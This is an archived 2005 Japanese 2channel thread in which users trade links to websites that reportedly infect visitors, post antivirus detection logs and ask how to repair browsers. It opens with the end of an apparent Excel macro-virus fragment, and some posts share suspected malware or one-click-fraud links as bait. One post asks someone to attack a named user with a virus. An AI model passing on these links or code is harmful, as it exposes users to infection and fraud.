m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
830:名無しさん@お腹いっぱい。
05/06/21 13:49:41
>>828
片方のAVに引っ掛かったら普通はもう片方には引っ掛からないものなんだが…
いやそれ以前に、ソースとAVGを同居させてるのか?
(複数の常駐型AVの同居は原則的にタブー)
831:名無しさん@お腹いっぱい。
05/06/21 14:24:30
>>828
仕様的には片方がブラウザでの実行を阻止した時点で、もう一方はそのファイルへのアクセスを
OSに排他処理されてしまうので検出すら出来ない。
しかし、S社のソフトはDownload Jectの脆弱性を攻撃するスクリプトファイルを
まず、ほとんど検出しない。
「ウィンドウズアップデートしろよ!」の姿勢なんだろう。
だが、セキュリティソフトとしては失格である。
832:名無しさん@お腹いっぱい。
05/06/27 08:58:16
URLリンク(www.nas.co.jp)
ブラウザの設定が関係しているのかもしれないが
ここにアクセスすると勝手に無限リロードが始まるw
833:名無しさん@お腹いっぱい。
05/06/28 01:00:58
困ってますお願いします。
2ちゃんの懸賞板で張ってあったこのリンクをクリックしたら
URLリンク(www.porn-news.net)
TAROJ_SMAL.STというファイルがトレンドマイクロのオンラインスキャンを
したら検出しました。
それで、システムの復元をしてもエラーで復元できず、
IEを開くたびに変な広告サイトやアダルトサイトが表示されてしまって
困ってます。
どうしたらいいのかまったく分からないので教えていただけないでしょうか。。
OSはウインドーズMEです。よろしくおねがいします
834:名無しさん@お腹いっぱい。
05/06/28 01:17:14
>>833
URLリンク(www.trendmicro.co.jp)
これとおなじらしい
835:名無しさん@お腹いっぱい。
05/06/28 01:29:58
>>834
そうなんですがどうしたらいいのでしょう・・
やっぱりウイルスバスターとか買わないとダメなのかな。不安です。。
836:名無しさん@お腹いっぱい。
05/06/28 01:31:56
834さんよる遅くにレスありがとうございます。
837:名無しさん@お腹いっぱい。
05/07/02 12:56:01
>>789
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
Win32/TrojanDownloader.Ani.C トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
Java/Exploit.Bytverify.F トロイ 切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
複数のウイルス切断されました
一応12個くらい見つかった。NOD32でアドバンストヒューリスティック機能有効。
838:名無しさん@お腹いっぱい。
05/07/07 23:22:29
硫黄
839:あぼーん
あぼーん
あぼーん
840:名無しさん@お腹いっぱい。
05/07/10 19:19:15
↑何を書いてたんだろ?
841:あぼーん
あぼーん
あぼーん
842:名無しさん@お腹いっぱい。
05/07/14 05:22:20
逝ってらっしゃい
URLリンク(195.225.177.38)
URLリンク(bbs.fozya.com)
843:あぼーん
あぼーん
あぼーん
844:名無しさん@お腹いっぱい。
05/07/15 19:36:56
URLリンク(porn.popon.cn)
上らへんをクリックすると…
845:名無しさん@お腹いっぱい。
05/07/16 19:45:29
あげ
846:名無しさん@お腹いっぱい。
05/07/16 20:33:03
スレリンク(sec板)
を開いたら感染しました!!!!!!111
847:名無しさん@お腹いっぱい。
05/07/16 21:14:07
>>844
危険!このアドレスはワンクリック詐欺サイトのひとつです。
注意!Set-Cookieが使われています。
注意!PHPに対応したサーバーです。
フィッシングチェックが終了しました。
[フィッシング詐欺などの可能性(Beta-Test) : 100%]
848:名無しさん@お腹いっぱい。
05/07/17 15:37:18
>>842
上のアドレスは36個も反応してくれたぞ。
NOD32(アドバンストヒューリスティック機能有効)
849:名無しさん@お腹いっぱい。
05/07/19 23:44:12
>>847
ワンクリック詐欺用だから危険でも何でもないと思うけどね、今時。
ファイルのダウンロードの時もどきの画面が出るんで、「何かインストールしてしまった?」
みたいな錯覚を起こさせる狡猾な詐欺ではあるね。
ただスピードが笑っちゃうね、1Mbpsで接続してんのに2.7Mbpsとかだし、
MeとかでもXPのデザインだしね。
850:名無しさん@お腹いっぱい。
05/07/24 11:57:32
URLリンク(mahoro.ddo.jp)
↑ここでIEが壊れたみたいなんですけど、直し方教えて頂けませんか・・
OSは2Kです。
851:名無しさん@お腹いっぱい。
05/07/24 12:45:25
>>850
そこで何をしたらどうなったのか書かんと誰にも対処のしようがないぞ
そこのページ自体は何の変哲もなさそうだしな
852:名無しさん@お腹いっぱい。
05/08/07 19:09:15
URLリンク(ck.jp.ap.valuecommerce.com)
ここを踏んでから時々URLをクリックしたりブラウザを閉じようとすると
RPCRT4.DLLエラーと出てInternetExplorerが強制終了されるようになりました
何か対処法はありますか?
853:名無しさん@お腹いっぱい。
05/08/29 20:10:47
ウイルスセキュリティでここを開いたら,ウイルスだと反応しました。
854:名無しさん@お腹いっぱい。
05/08/30 15:09:03
URLリンク(www.hellplant.org)
踏みました…。どの程度のヤバさでしょうか?
855:名無しさん@お腹いっぱい。
05/09/04 19:39:46
URLリンク(bohemiansuzuki.bravehost.com)
これ踏んでしまいました。ノートンでは削除・検疫できないと表示されます。ヤバイですか?
856:名無しさん@お腹いっぱい。
05/09/06 20:39:41
趣旨とは違うが
中国 やふーに行って 天安門 などを検索 すると
2回目以降で.......
857:名無しさん@お腹いっぱい。
05/09/12 01:40:50
>>854
通称「厨房ホイホイ」・・・(w
858:名無しさん@お腹いっぱい。
05/10/01 14:08:39
◆Yw2l5Bi7Kg ←こいつにウイル○攻撃を…頼んだ…
スレリンク(lic板)
859:名無しさん@お腹いっぱい。
05/10/02 03:41:04
怖いですねー。
860:名無しさん@お腹いっぱい。
05/10/02 07:36:48
URLリンク(www.grannymax.com)
これひらいたらクラッチャッタヨ;;
どうしたらいいのか教えてホチィホチィ(´・ω・`)
861:名無しさん@お腹いっぱい。
05/10/02 08:46:23
>>860
OS再インスコ
862:名無しさん@お腹いっぱい。
05/10/02 11:44:42
>>861
サンクス
それしか方法ないのですか
CDさがしてきも(´・ω・`)
863:名無しさん@お腹いっぱい。
05/10/02 23:44:09
URLリンク(www.unko.com)
↑
糞ヤバ。
864:名無しさん@お腹いっぱい。
05/10/03 15:20:03
激ヤバ !!
操作不能。
URLリンク(upld2.x0.com)
865:名無しさん@お腹いっぱい。
05/10/03 18:26:31
>>864
著作権が危ない!
866:名無しさん@お腹いっぱい。
05/10/04 13:27:03
カスペルスキークラスのウイルス対策ソフトじゃないと怖くて踏めないサイトだらけだなw
avast!+BitDefender 8 Free Editionでは無理ですw
867:名無しさん@お腹いっぱい。
05/10/04 13:32:22
いつも言ってるがおめえらレベルが貼り付けてるのなんて屁でもないわ
アホくさあ
868:名無しさん@お腹いっぱい。
05/10/04 13:37:15
いつ、何処で言ったんだよ?
869:名無しさん@お腹いっぱい。
05/10/04 19:44:30
これはどうかね。
URLリンク(www.oldandplump.com)
870:名無しさん@お腹いっぱい。
05/10/04 20:10:16
わざと感染させようと思って、WindowsUpdateだけやったSP2でカスタマイズもしないで
丸裸で踏んでいるんだけど、もう1年も何も拾わないんだよな。
ダメだ おまえらは。
やばかったのは去年の5月頃だけ。
まだDownload Jectの脆弱性が完全に対応されないままで市場に情報だけ流れてしまったからな。
871:名無しさん@お腹いっぱい。
05/10/04 23:15:45
URLリンク(www.albinoblacksheep.com)
当方VB2005使用
このURLはゾンビサイト(?)て名前で有名らしいけど
環境によってはトロイ系のウイルス反応出るらしい
おれ試しに踏んでみたけど反応なかった
フラッシュのブラクラ仕掛けてあっただけだった
872:名無しさん@お腹いっぱい。
05/10/05 16:59:51
(・3・) エェー どんどんお願します。
873:名無しさん@お腹いっぱい。
05/10/06 16:25:59
>>872
∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) < これからもYorosiku !!
| | | \_____
(__)___)
874:名無しさん@お腹いっぱい。
05/10/08 01:15:10
ひひひ
875:名無しさん@お腹いっぱい。
05/10/08 01:18:18
有効なファイル(キングソフトアンチウィルスが未対応の新種ウィルス)をお送りいただいた方には、
特製USBメモリ(128MB)をお送りさせていただきます。
皆様のご協力をお願いいたします。
キングソフト サポートセンター
URLリンク(www.kingsoft.jp)
876:名無しさん@お腹いっぱい。
05/10/08 03:02:09
>>875
意図はともかく郵送ってのが良くわからん
こういう事はスピードが大事なのに
877:名無しさん@お腹いっぱい。
05/10/11 14:19:32
>>274
URLリンク(otona-only.com)
( ^∀^)ゲラ
878:名無しさん@お腹いっぱい。
05/10/11 17:59:48
∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) < パソ壊れた。
| | | \_____
(__)___)
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
4995日前に更新/214 KB
担当:undef